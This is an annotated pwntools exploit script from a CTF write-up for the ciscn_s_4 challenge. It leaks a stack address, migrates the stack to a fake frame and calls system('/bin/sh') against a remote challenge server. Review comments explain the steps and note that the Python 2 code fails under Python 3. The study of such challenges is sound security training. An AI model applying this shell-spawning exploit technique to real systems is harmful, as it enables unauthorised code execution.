# CTF write-up script for the ciscn_s_4 challenge (pwntools).  The page's own
# note describes the technique as stack migration (栈迁移): the first send
# overflows a buffer to read a saved stack address back, the second send
# places a fake frame and redirects execution into it via a hard-coded
# `leave` address.  The script hard-codes a symbol address and a gadget
# address taken from the binary, so it presumably relies on the target being
# non-PIE and the leaked stack value being reliable -- neither is verifiable
# from this listing alone.
#
# NOTE(review): the script mixes `bytes` and `str` literals
# (`b'a'*0x24+'bbbb'`, `'bbbb'+p32(...)`, `payload.ljust(0x28,'\x00')` on a
# bytes value).  Each of those raises TypeError under Python 3, so this was
# evidently written against Python 2 / an older pwntools; it will not run
# unmodified on a current interpreter.
from pwn import*
# LibcSearcher is imported but no name from it is used anywhere in this script.
from LibcSearcher import*
# Log every byte sent/received, which is what the write-up's transcript shows.
context.log_level = 'debug'
# Remote CTF instance; the commented-out line is the local-process alternative.
io = remote("node4.buuoj.cn",25235)
#io = process('./ciscn_s_4')
elf = ELF('./ciscn_s_4')
# Address of `system` read from the binary's own symbol table (usable as an
# absolute address only if the binary is loaded at a fixed base).
system_addr = elf.sym['system']
# Hard-coded address the author labels "leave"; presumably a `leave; ret`
# gadget inside the binary -- TODO confirm against the disassembly.
leave_addr =0x080485FD
# Drain whatever the program prints first.
io.recv()
# 0x24 bytes of filler followed by a 4-byte marker 'bbbb' (see NOTE above:
# bytes + str is a TypeError on Python 3).
payload = b'a'*0x24+'bbbb'
io.send(payload)
# Skip the echoed marker, then take the next 4 bytes as a little-endian u32.
# The author names this value ebp_addr, i.e. a saved frame pointer that the
# program leaks back after the marker -- inferred from the name only.
io.recvuntil('bbbb')
ebp_addr = u32(io.recv(4))
log.success('ebp_addr:'+hex(ebp_addr))
# Second payload: marker, address of `system`, a 4-byte dummy return slot,
# a pointer computed relative to the leaked value, then the "/bin/sh\0"
# string.  The offsets 0x38 and 16 encode the author's stack layout for this
# binary and cannot be checked from here.
payload = 'bbbb'+p32(system_addr)+b'aaaa'+p32(ebp_addr-0x38+16)+'/bin/sh\x00'
# NUL-pad to 0x28 bytes so the next two words land at a fixed position
# (ljust with a str fill character fails on a bytes payload in Python 3).
payload = payload.ljust(0x28,'\x00')
# New saved-frame-pointer value followed by the `leave` address, which is what
# redirects execution into the frame built above.
payload += p32(ebp_addr-0x38)+p32(leave_addr)
io.send(payload)
io.interactive()
总结一下,栈迁移一般都会遇到两次输入,然后呢,bss段可执行就可以往bss段上写,不行就得往栈上迁移。
